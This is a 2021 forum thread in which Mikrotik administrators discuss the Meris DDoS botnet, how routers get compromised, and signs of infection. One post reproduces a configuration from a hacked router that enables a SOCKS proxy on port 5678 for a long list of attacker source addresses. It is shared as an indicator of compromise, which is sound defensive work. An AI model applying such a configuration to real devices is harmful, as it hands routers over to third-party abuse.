200k Mikrotik devices involved in DDoS botnet

R1CH · September 9, 2021, 3:21pm

Looks like there is a new DDoS botnet on the loose, comprised of Mikrotik devices.

We do not know precisely what particular vulnerabilities lead to the situation where Mikrotik devices are being compromised on such a large scale. Several records at the Mikrotik forum indicate that its customers experienced > hacking attempts on older versions of RouterOS, particularly 6.40.1 from 2017> . If this is correct and we see that old vulnerability still being active on thousands of devices being unpatched and unupgraded, this is horrible news. However, our data with Yandex indicates that this is not true – because the spectrum of RouterOS versions we see across this botnet varies from years old to recent. > The largest share belongs to the version of firmware previous to the current Stable one> .

https://blog.qrator.net/en/meris-botnet-climbing-to-the-record_142/

This is scary - how are devices running 6.48.3 being infected? If there was a weak admin password and no firewall I could understand them being compromised, but the attacker should still be limited to boring things like running proxies and VPNs and whatever other functions exist in RouterOS. A scripted fetch attack also wouldn’t generate such high levels of traffic, the fact that they can be used for a DDoS with a HTTP pipelining attack implies that the device has been rooted to run arbitrary code which shouldn’t be possible with modern RouterOS versions. Is there a new exploit going around?

rextended · September 9, 2021, 3:30pm

One simple thing: NAT

If one internal non-MikroTik device are infected, this appear coming from the Router…
How many % of the case are not involved at all the Router???

anav · September 9, 2021, 3:39pm

Perhaps related to the recent blocking of the MT cloud service??

Paternot · September 9, 2021, 3:53pm

Maybe they were infected earlier, and just upgraded without netinstall?

Anastasia · September 9, 2021, 6:06pm

what are the signs that the device is infected?
for example: the presence of extraneous scripts, the presence of a new user who was recently created or something else?

rextended · September 9, 2021, 6:09pm

Usuallu Socks open, and script on scheduler, some download files on flies or files undeletable, vpn, etc.

jspool · September 10, 2021, 1:56am

The instances I have seen are from poor password and update policies as well as not limiting management access to the routers. Some had old RouterOS versions that were exploited and the user/pass was obtained and used on other Mikrotik routers that were running newer versions but utilizing the same user/pass.

Example of one that was compromised:
/ip socks
set enabled=yes max-connections=500 port=5678
/ip socks access
add src-address=77.238.240.0/24
add src-address=178.239.168.0/24
add src-address=77.238.228.0/24
add src-address=94.243.168.0/24
add src-address=213.33.214.0/24
add src-address=31.172.128.45
add src-address=31.172.128.25
add src-address=10.0.0.0/8
add src-address=185.137.233.251
add src-address=5.9.163.16/29
add src-address=176.9.65.8
add src-address=82.202.248.5
add src-address=95.213.193.133
add src-address=136.243.238.211
add src-address=178.238.114.6
add src-address=46.148.232.205
add src-address=138.201.170.176/29
add src-address=178.63.52.200/29
add src-address=136.243.90.80/29
add src-address=136.243.21.232/29
add src-address=95.213.221.0/24
add src-address=159.255.24.0/24
add src-address=31.184.210.0/24
add src-address=188.187.119.0/24
add src-address=188.233.1.0/24
add src-address=188.233.5.0/24
add src-address=188.233.13.0/24
add src-address=188.232.101.0/24
add src-address=188.232.105.0/24
add src-address=188.232.109.0/24
add src-address=176.212.165.0/24
add src-address=176.212.169.0/24
add src-address=176.212.173.0/24
add src-address=176.213.161.0/24
add src-address=176.213.165.0/24
add src-address=176.213.169.0/24
add src-address=5.3.113.0/24
add src-address=5.3.117.0/24
add src-address=5.3.121.0/24
add src-address=5.3.145.0/24
add src-address=5.3.149.0/24
add src-address=5.3.153.0/24
add src-address=5.167.9.0/24
add src-address=5.167.13.0/24
add src-address=5.167.17.0/24
add src-address=94.180.1.0/24
add src-address=94.180.5.0/24
add src-address=94.180.9.0/24
add src-address=217.119.22.83
add src-address=192.243.53.0/24
add src-address=192.243.55.0/24
add src-address=176.9.65.8
add src-address=135.181.15.102
add src-address=198.18.0.0/15
add src-address=139.99.94.160/29
add src-address=5.188.119.191
add src-address=178.63.52.202
add src-address=136.243.21.233
add src-address=136.243.90.81
add src-address=94.130.223.9
add action=deny src-address=0.0.0.0/0

Znevna · September 10, 2021, 4:25am

Ah, so the hackers use socks, that’s why it’s still in RouterOS.

mkamenjak · September 10, 2021, 6:23am

Perhaps future routeros versions should separate socks into a separate package. I mean in my thousands of mikrotiks that I have logged in into, the only time I have seen it being used was on routers that were previously hacked.

mkamenjak · September 10, 2021, 6:23am

Check for scripts, schedulers, and if IP socks was used.

JelleM · September 10, 2021, 7:27am

What worries me is that they all seem to have port 2000 open (Bandwidth Test Server), that could be either an infection vector (vulnerability in implementation) or because of a lacking default firewall (btest server is running by default).